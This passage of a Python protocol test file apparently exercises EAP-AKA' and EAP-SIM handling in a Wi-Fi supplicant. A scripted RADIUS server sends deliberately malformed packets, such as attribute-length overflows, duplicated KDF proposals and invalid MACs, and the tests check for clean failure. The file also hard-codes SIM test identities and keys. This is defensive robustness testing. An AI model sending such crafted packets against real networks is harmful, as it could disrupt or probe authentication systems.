                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple unsupported KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 2 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with multiple KDF proposals")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 3 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with invalid MAC, RAND, AUTN values)")
            return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - AMF separation bit not set)")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 9, 10,
                               0x2fda8ef7, 0xbba518cc)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - Invalid MAC")
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
                               0xd1f90322, 0x40514cb4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - Valid MAC")
            # The MAC words here are a precomputed value matching the fixed
            # RAND/AUTN below and the hard-coded credentials used by the
            # connect() loop, so the peer accepts this challenge.
            return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
                               ord('c'), ord('d'),
                               EAP_SIM_AT_KDF, 1, 1,
                               EAP_SIM_AT_MAC, 5, 0,
                               0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
                               EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
                               EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
                               0xd1f90322, 0x40514cb4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_KDF_INPUT length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid AT_KDF length")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_KDF, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge with large number of KDF proposals")
            return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 12 * 4,
                               EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_KDF, 1, 255,
                               EAP_SIM_AT_KDF, 1, 254,
                               EAP_SIM_AT_KDF, 1, 253,
                               EAP_SIM_AT_KDF, 1, 252,
                               EAP_SIM_AT_KDF, 1, 251,
                               EAP_SIM_AT_KDF, 1, 250,
                               EAP_SIM_AT_KDF, 1, 249,
                               EAP_SIM_AT_KDF, 1, 248,
                               EAP_SIM_AT_KDF, 1, 247,
                               EAP_SIM_AT_KDF, 1, 246,
                               EAP_SIM_AT_KDF, 1, 245,
                               EAP_SIM_AT_KDF, 1, 244)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        # All scripted cases consumed; end the exchange.
        return None
    srv = start_radius_server(aka_prime_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each iteration triggers a fresh connection attempt that walks the
        # peer through the next group of handler-generated messages.
        for i in range(0, 16):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="AKA'", identity="6555444333222111",
                           password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            if i in [ 0 ]:
                # This iteration is not expected to report an immediate EAP
                # failure; give the exchange a moment before cleanup.
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_sim(dev, apdev):
    """EAP-SIM protocol tests"""
    def sim_handler(ctx, req):
        # Server-side EAP handler driven by the test RADIUS server.
        # ctx['num'] counts the EAP responses received so far and is matched
        # against the running idx counter below to select which hand-crafted
        # (mostly malformed) EAP-SIM request to send next. Returning None
        # ends the dialogue.
        # NOTE: req.encode("hex") is a Python 2 str idiom; this file predates
        # the Python 3 port.
        logger.info("sim_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        # The EAP Identifier field is a single octet; wrap around at 256.
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        # Each struct.pack() below builds a raw EAP packet:
        # code, identifier, total length, then the EAP-SIM payload
        # (method type, subtype, reserved, followed by TLV attributes).
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_SIM)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_AUTN")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_AUTN, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: AT_VERSION_LIST overflow")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_AUTS")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_AUTS, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected AT_CHECKCODE")
            return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_CHECKCODE, 2, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_VERSION_LIST in Start")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No support version in AT_VERSION_LIST")
            return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request without ID type")
            return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request PERMANENT_ID (duplicate)")
            return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
                               EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
                               EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_MAC and AT_RAND in Challenge")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No AT_RAND in Challenge")
            return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Insufficient number of challenges in Challenge")
            return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 20 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too many challenges in Challenge")
            return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
                               ctx['id'],
                               4 + 1 + 3 + 4 + 4 * 16 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Same RAND multiple times in Challenge")
            return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
                               ctx['id'],
                               4 + 1 + 3 + 4 + 3 * 16 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
                               EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
                               0, 0, 0, 0,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # 32768 = 0x8000 (S bit set in the notification code).
            logger.info("Test: Notification indicating success, but no MAC")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification indicating success, but invalid MAC value")
            return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 20,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 32768,
                               EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # 16384 = 0x4000 (P bit: notification before authentication).
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16384)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 16385)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification with unrecognized non-failure")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Notification before auth (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
                               EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Re-authentication (unexpected) with no attributes")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Client Error")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown subtype")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SIM, 255, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        # All scripted cases consumed; end the exchange.
        return None
    srv = start_radius_server(sim_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each iteration triggers a fresh connection attempt that walks the
        # peer through the next group of handler-generated messages.
        for i in range(0, 25):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            if i in [ 0 ]:
                # This iteration is not expected to report an immediate EAP
                # failure; give the exchange a moment before cleanup.
                time.sleep(0.1)
            else:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_sim_errors(dev, apdev):
    """EAP-SIM protocol tests (error paths)"""
    check_hlr_auc_gw_support()
    ap_params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], ap_params)
    sim_password = "90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581"

    # Failures injected while the EAP method is being initialized: the
    # method must refuse to start without crashing.
    init_cases = [ (alloc_fail, "eap_sim_init"),
                   (fail_test, "os_get_random;eap_sim_init") ]
    for wrapper, func in init_cases:
        with wrapper(dev[0], 1, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password=sim_password,
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()

    # Failures injected during fast re-authentication following a
    # successful initial connection.
    reauth_cases = [ (fail_test, "aes_128_cbc_encrypt;eap_sim_response_reauth",
                      "GET_FAIL"),
                     (fail_test, "os_get_random;eap_sim_msg_add_encr_start",
                      "GET_FAIL"),
                     (fail_test, "os_get_random;eap_sim_init_for_reauth",
                      "GET_FAIL"),
                     (alloc_fail,
                      "eap_sim_parse_encr;eap_sim_process_reauthentication",
                      "GET_ALLOC_FAIL") ]
